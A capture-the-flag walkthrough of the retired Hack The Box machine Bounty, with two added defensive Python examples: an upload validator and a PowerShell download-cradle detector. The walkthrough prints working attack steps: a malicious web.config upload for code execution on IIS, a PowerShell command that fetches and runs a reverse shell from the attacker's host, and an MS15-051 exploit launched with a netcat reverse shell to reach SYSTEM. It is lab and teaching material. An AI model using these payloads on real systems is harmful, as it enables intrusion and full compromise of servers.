Hack The Box: Bounty Walkthrough

Hello friends, this is p4pentest. The Hack The Box machine Bounty is now retired, so the walkthrough for this really good challenge can be posted. I divided the solution for the machine into the three sections below:

  • Initial Enumeration
  • Local Shell Access
  • Privilege Escalation

Victim IP Address: 10.10.10.93

Attacker IP Address(p4pentest): 10.10.14.13

Initial Enumeration

I ran an nmap scan for initial enumeration to find the open ports, the services running on them and the operating system. I used an aggressive scan (-A) against the default ports:

root@kali:~/Bounty# nmap -A 10.10.10.93 -Pn -n
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 07:52 IST
Nmap scan report for 10.10.10.93
Host is up (0.12s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

From the above result it was clear that only port 80 was open, so I browsed to the IP address in a browser and found the page shown below:

The page itself contains no useful information, so I used gobuster to enumerate directories and files. Before that I wanted to find out which server-side language the backend uses, so I requested a random filename with the extensions of different server-side languages. The .aspx request produced the error shown in the image below.

It was clear that the server uses ASPX for its server-side pages.

So I started gobuster with the command below to enumerate directories and files:

root@kali:~/Bounty# gobuster -u 10.10.10.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .aspx,.html -t 80
=====================================================
Gobuster v2.0.0 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.93/
[+] Threads : 80
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : aspx,html
[+] Timeout : 10s
=====================================================
2018/11/03 09:17:26 Starting gobuster
=====================================================
/transfer.aspx (Status: 200)
/UploadedFiles (Status: 301)
/uploadedFiles (Status: 301)

Local Shell Access

I browsed to 'transfer.aspx' and found a file upload page.

I tried various methods of uploading a shell, but they all failed with the error shown below.

I searched on Google and found a blog post describing how to get RCE by uploading a web.config file. I took the web.config code from that blog, but since I did not understand it fully, I modified it to the version shown below:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<%Response.write(2+3)
%>

I did this to check whether the response returns the value '5', the sum of the '2' and '3' that I put in the web.config file. The upload succeeded and the response was '5'.
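What the upload endpoint would have needed in order to refuse this file, as an added example that is not part of the original post and not the code of the Bounty box (transfer.aspx's real checks are not shown anywhere on the page): a Python version of the server-side validation, with an extension allow-list, a block on file names IIS interprets itself, a check for double extensions, and a cheap screen of the content for inline ASP code and IIS configuration elements. The allow-list, the function name and the sample uploads are my assumptions.

```python
import re
from pathlib import PureWindowsPath

# Extensions the upload feature actually needs (assumed for this example).
ALLOWED_EXTENSIONS = {".jpg", ".png", ".pdf", ".txt"}
# File names IIS/ASP.NET interprets itself; a user-controlled web.config in a
# served directory can add handler mappings and relax request filtering.
RESERVED_NAMES = {"web.config", "global.asax", "machine.config"}
# Extensions that must not appear anywhere in the name (double extensions).
SERVER_SIDE_SUFFIXES = {".config", ".asp", ".aspx", ".ashx", ".asax", ".asmx"}
# Cheap content screen: inline ASP code and IIS configuration elements have no
# business inside an image or document. Binary formats should additionally be
# checked by magic bytes; this regex alone can false-positive on random bytes.
SUSPICIOUS_CONTENT = re.compile(
    rb"<%|<configuration\b|<system\.webServer\b|<handlers\b|<requestFiltering\b",
    re.IGNORECASE,
)

def validate_upload(filename: str, content: bytes) -> tuple:
    """Return (accepted, reason); the first failing check wins."""
    # Keep only the final path component; a name containing separators
    # (e.g. "..\web.config") is rejected outright rather than normalised.
    name = PureWindowsPath(filename).name
    if not name or name != filename:
        return False, "empty name or path separators present"
    lower = name.lower()
    if lower in RESERVED_NAMES:
        return False, f"reserved IIS file name: {name}"
    suffixes = PureWindowsPath(lower).suffixes  # e.g. ["​.aspx", ".jpg"]
    if not suffixes or suffixes[-1] not in ALLOWED_EXTENSIONS:
        return False, "extension not on the allow-list"
    if any(s in SERVER_SIDE_SUFFIXES for s in suffixes):
        return False, "server-side extension embedded in name"
    if SUSPICIOUS_CONTENT.search(content):
        return False, "content contains server-side code or IIS configuration"
    return True, "ok"

# Constructed upload attempts, including the web.config trick from this walkthrough.
SAMPLE_UPLOADS = [
    ("photo.jpg", b"\xff\xd8\xff\xe0 constructed jpeg bytes"),
    ("web.config", b"<configuration><system.webServer><handlers>"),
    ("Web.Config", b"<configuration>"),
    ("notes.txt", b"<% Response.Write(2+3) %>"),
    ("shell.aspx.jpg", b"constructed"),
    ("..\\web.config", b"constructed"),
]

if __name__ == "__main__":
    for fname, data in SAMPLE_UPLOADS:
        ok, why = validate_upload(fname, data)
        print(f"{'ACCEPT' if ok else 'REJECT'} {fname}: {why}")
```

The order of the checks matters: the reserved-name test runs on the lower-cased name before any extension logic, so `Web.Config` is caught regardless of casing, and the allow-list is consulted only on the last suffix while the server-side list is checked against every suffix, which is what stops `shell.aspx.jpg`.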


The file was uploaded successfully, without any error this time.


Then I browsed to the uploaded file in '/uploadedfiles/' (the directory found by gobuster) using the link below:

http://10.10.10.93/uploadedfiles/web.config

The response was '5', as shown below:


To confirm that I could execute commands on the remote system, I modified the web.config file as shown below:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<%Response.write(2+3)
Set objShell = CreateObject("WScript.Shell")
objShell.Exec("cmd /c ping 10.10.14.13")
%>

I uploaded the modified web.config file and started tcpdump on my machine (10.10.14.13). Then I browsed to the web.config file and saw the ping requests arrive in tcpdump:

root@kali:~/Bounty# tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
10:38:30.805462 IP 10.10.10.93 > kali: ICMP echo request, id 1, seq 9, length 40
10:38:30.805482 IP kali > 10.10.10.93: ICMP echo reply, id 1, seq 9, length 40
10:38:31.804610 IP 10.10.10.93 > kali: ICMP echo request, id 1, seq 10, length 40
10:38:31.804630 IP kali > 10.10.10.93: ICMP echo reply, id 1, seq 10, length 40
10:38:32.910887 IP 10.10.10.93 > kali: ICMP echo request, id 1, seq 11, length 40
10:38:32.910913 IP kali > 10.10.10.93: ICMP echo reply, id 1, seq 11, length 40
10:38:33.831733 IP 10.10.10.93 > kali: ICMP echo request, id 1, seq 12, length 40
10:38:33.831752 IP kali > 10.10.10.93: ICMP echo reply, id 1, seq 12, length 40

This confirmed that we have remote code execution. So I downloaded the nishang PowerShell reverse shell 'Invoke-PowerShellTcp.ps1' from the link and modified it by adding the last line shown below to the end of the file:

    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
        Write-Error $_
    }
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.13 -Port 4450

That line contains my attacker machine's IP address and the port on which I started a netcat listener for the reverse shell:

root@kali:~/Bounty# nc -lvp 4450
listening on [any] 4450 ...

I modified the web.config file as shown in the code below:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<%Response.write(2+3)
Set objShell = CreateObject("WScript.Shell")
objShell.Exec("cmd /c powershell IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13/Invoke-PowerShellTcp.ps1')")
%>

Then I started a Python web server on port 80, from which the web.config will download and execute the script, using the command below:

root@kali:~/Bounty# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

I uploaded the web.config file and accessed it using the link below:

http://10.10.10.93/uploadedfiles/web.config

The web server access log showed the victim machine fetching the PowerShell reverse shell:

root@kali:~/Bounty# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.93 -- -- [03/Nov/2018 11:35:51] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 --

And I got a shell as a normal user:

root@kali:~/Bounty# nc -lvp 4450
listening on [any] 4450 ...
10.10.10.93: inverse host lookup failed: Unknown host
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.93] 49174
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>whoami
bounty\merlin
PS C:\windows\system32\inetsrv>
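The one-liner that the web.config runs (and the same shape used later to load Sherlock.ps1) is a fetch-and-execute "download cradle", which is exactly what PowerShell Script Block Logging (Event ID 4104) records in clear text once it is enabled. As an added example that is not part of the original post, here is a small Python classifier for such logged script blocks; the sample blocks are constructed after the commands in this walkthrough, and the indicator lists and severity labels are my own choice, not a vendor rule set.

```python
import re

# Constructs that evaluate a string as PowerShell code.
INVOKE = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.IGNORECASE)
# Constructs that pull remote content into a string or a file.
FETCH = re.compile(
    r"\b(?:DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b",
    re.IGNORECASE,
)
# Good enough to pull the remote location out of a logged block for triage.
URL = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)

def classify_script_block(text: str) -> dict:
    """Classify one logged script block by the indicators it contains."""
    has_invoke = INVOKE.search(text) is not None
    has_fetch = FETCH.search(text) is not None
    urls = URL.findall(text)
    if has_invoke and has_fetch:
        severity = "high"    # fetch and execute in one statement
    elif has_fetch and urls:
        severity = "medium"  # download only; execution may follow in another block
    else:
        severity = "none"
    return {"text": text, "severity": severity, "invoke": has_invoke,
            "fetch": has_fetch, "urls": urls}

# Constructed sample blocks, modelled on the commands in this walkthrough.
SAMPLE_BLOCKS = [
    "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13/Invoke-PowerShellTcp.ps1')",
    "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.13/nc64.exe','c:\\windows\\temp\\nc64.exe')",
    "Get-ChildItem C:\\windows\\temp | Sort-Object LastWriteTime",
]

def scan(blocks):
    """Classify every block, in order, so callers can filter or alert on severity."""
    return [classify_script_block(b) for b in blocks]

if __name__ == "__main__":
    for verdict in scan(SAMPLE_BLOCKS):
        print(f"[{verdict['severity']:6}] {verdict['text'][:70]}  urls={verdict['urls']}")
```

The split into "high" (fetch and execute in one block) and "medium" (fetch only) is deliberate: the DownloadFile of nc64.exe later in this walkthrough is not executed by the same statement, so a rule that only fires on IEX would miss the staging step entirely.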

Privilege Escalation

First I ran the command below to identify the OS name, version and system type:

PS C:\windows\temp> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
System Type: x64-based PC

Then I downloaded the Sherlock.ps1 PowerShell script, which finds missing software patches for local privilege escalation vulnerabilities, from the link, added the line 'Find-AllVulns' to the end of the file so that it checks for all vulnerabilities, and hosted it on the attacker machine:

}
Set-ExploitTable $MSBulletin $VulnStatus
}
Find-AllVulns

I ran it on the victim machine from the temp folder using the command below:

PS C:\windows\temp> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.13/Sherlock.ps1')

The script found two vulnerabilities, one related to 'Task Scheduler .XML' and the other to 'ClientCopyImage Win32k':

Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

I went with the second vulnerability, 'MS15-051', and searched for an exploit for it. I found one at the link and downloaded it to my working folder on the attacker machine. I extracted the zip 'MS15-051-KB3045171.zip' and copied the file 'ms15-051x64.exe' from the folder 'ms15-051x64.exe' to the Bounty folder. I used the 64-bit exe because the installed OS was 64-bit. I also downloaded the 64-bit netcat from the link.

I downloaded ms15-051x64.exe and nc64.exe to the victim machine using the commands below:

PS C:\windows\temp> (New-Object System.Net.WebClient).DownloadFile('http://10.10.14.13/ms15-051x64.exe','c:\windows\temp\ms15-051x64.exe')
PS C:\windows\temp> (New-Object System.Net.WebClient).DownloadFile('http://10.10.14.13/nc64.exe','c:\windows\temp\nc64.exe')
PS C:\windows\temp> dir
Directory: C:\windows\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 6/10/2018 3:44 PM vmware-SYSTEM
-a--- 5/30/2018 3:19 AM 0 DMI5FAC.tmp
-a--- 11/3/2018 10:51 AM 55296 ms15-051x64.exe
-a--- 11/3/2018 10:51 AM 43696 nc64.exe
-a--- 6/10/2018 3:44 PM 203777 vminst.log
-a--- 11/3/2018 4:09 AM 57470 vmware-vmsvc.log
-a--- 6/11/2018 12:47 AM 22447 vmware-vmusr.log
-a--- 11/3/2018 4:09 AM 910 vmware-vmvss.log

I started a listener on port 4446 and the Python web server on the attacker machine.

Then I ran the command below in the normal user shell on the victim machine to execute the exploit:

PS C:\windows\temp> ./ms15-051x64.exe "c:\windows\temp\nc64.exe -e cmd 10.10.14.13 4446"

I got a reverse shell with SYSTEM-level privileges:

root@kali:~/Bounty# nc -lvp 4446
listening on [any] 4446 ...
10.10.10.93: inverse host lookup failed: Unknown host
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.93] 49172
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\windows\temp>whoami
whoami
nt authority\system
